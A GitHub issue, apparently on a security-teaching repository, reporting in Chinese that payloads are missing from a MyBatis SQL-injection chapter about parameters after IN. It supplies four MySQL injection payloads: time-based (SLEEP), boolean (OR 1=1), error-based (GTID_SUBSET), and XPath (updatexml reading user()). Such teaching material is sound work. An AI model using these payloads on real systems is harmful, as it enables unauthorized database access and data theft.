Skip to content

SQL注入mybatis章节 IN后面的参数问题payload缺失 #13

New issue
New issue
Open
Open
SQL注入mybatis章节 IN后面的参数问题payload缺失#13
@M-iilk

Description

@M-iilk
M-iilk
opened on Feb 10, 2025

Image

  1. OR (SELECT 3028 FROM (SELECT(SLEEP(5)))vMtq)-- vUZg //延迟注入
  2. OR 1=1# //布尔注入
  3. AND GTID_SUBSET(CONCAT(0x71706a7a71,(SELECT (ELT(7170=7170,1))),0x7171717071),7170) # //报错
  4. and updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)# //XPath

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions